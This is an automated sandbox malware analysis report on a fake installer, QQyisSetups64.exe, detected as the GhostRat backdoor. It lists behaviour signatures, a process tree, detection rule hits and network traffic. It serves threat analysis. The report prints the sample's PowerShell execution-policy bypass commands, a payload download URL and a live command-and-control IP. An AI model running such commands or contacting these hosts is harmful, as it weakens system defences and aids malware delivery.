Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QQyisSetups64.exe

Overview

General Information

Sample name:QQyisSetups64.exe
Analysis ID:1581909
MD5:b4f00fba3327488d4cb6fd36b2d567c6
SHA1:4f0548a2f6bf73a85ff17f40f420098019ac05ff
SHA256:d6a84954e038ddf4a0026705e0942fc003cfdc04e58f658a6bd9e89c37c57d18
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
Checks if browser processes are running
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • QQyisSetups64.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\QQyisSetups64.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)
    • QQyisSetups64.exe (PID: 7892 cmdline: "C:\Users\user\AppData\Roaming\QQyisSetups64.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)
      • cmd.exe (PID: 8068 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8136 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 8076 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8180 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • inst.exe (PID: 1464 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • inst.exe (PID: 2440 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • svchost.exe (PID: 3964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
QQyisSetups64.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    QQyisSetups64.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\QQyisSetups64.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        C:\Users\user\AppData\Roaming\QQyisSetups64.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          SourceRuleDescriptionAuthorStrings
          00000003.00000002.1456396278.0000000000403000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000003.00000000.1279423862.00000000006F9000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              00000003.00000000.1279062658.0000000000401000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: QQyisSetups64.exe PID: 7736JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Process Memory Space: QQyisSetups64.exe PID: 7892JoeSecurity_GhostRatYara detected GhostRatJoe Security
                    SourceRuleDescriptionAuthorStrings
                    3.2.QQyisSetups64.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      3.0.QQyisSetups64.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        3.0.QQyisSetups64.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8136, ProcessName: powershell.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8136, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3964, ProcessName: svchost.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-29T11:18:25.795527+010020528751A Network Trojan was detected192.168.2.749723118.107.44.21919091TCP
                          2024-12-29T11:19:39.214553+010020528751A Network Trojan was detected192.168.2.749736118.107.44.21919091TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.5% probability

                          Compliance

                          barindex
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeUnpacked PE file: 3.2.QQyisSetups64.exe.400000.0.unpack
                          Source: QQyisSetups64.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeFile created: C:\Users\user\Desktop\Logs\QQyisSetups64.logJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile created: C:\Users\user\AppData\Roaming\Logs\QQyisSetups64.logJump to behavior
                          Source: unknownHTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.7:49708 version: TLS 1.2
                          Source: Binary string: \Release\Code_Shellcode.pdb source: QQyisSetups64.exe, QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr
                          Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
                          Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
                          Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
                          Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
                          Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: z:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: x:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: v:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: t:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: r:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: p:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: n:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: l:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: j:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: h:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: f:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: b:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: y:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: w:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: u:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: s:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: q:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: o:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: m:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: k:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: i:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: g:Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: e:Jump to behavior
                          Source: C:\Windows\System32\svchost.exeFile opened: c:
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile opened: [:Jump to behavior
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ACD292 _memset,FindFirstFileW,FindNextFileW,FindClose,15_2_00ACD292
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,15_2_00ACD71E
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,15_2_00ADD670
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00AD3FB0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C5EE2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,15_2_6C5EE2B7
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,16_2_00ADD670
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,16_2_00ACD71E
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00AD3FB0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037880F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_037880F0

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.7:49723 -> 118.107.44.219:19091
                          Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.7:49736 -> 118.107.44.219:19091
                          Source: global trafficTCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
                          Source: global trafficTCP traffic: 192.168.2.7:49706 -> 118.107.44.219:8853
                          Source: global trafficUDP traffic: 192.168.2.7:18434 -> 1.192.136.170:3478
                          Source: global trafficUDP traffic: 192.168.2.7:18434 -> 1.192.136.171:3478
                          Source: global trafficUDP traffic: 192.168.2.7:18434 -> 8.46.123.189:33500
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=10788264 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_10001BB0 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,exit,3_2_10001BB0
                          Source: global trafficHTTP traffic detected: GET /inst.exe HTTP/1.1User-Agent: URLDownloaderHost: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
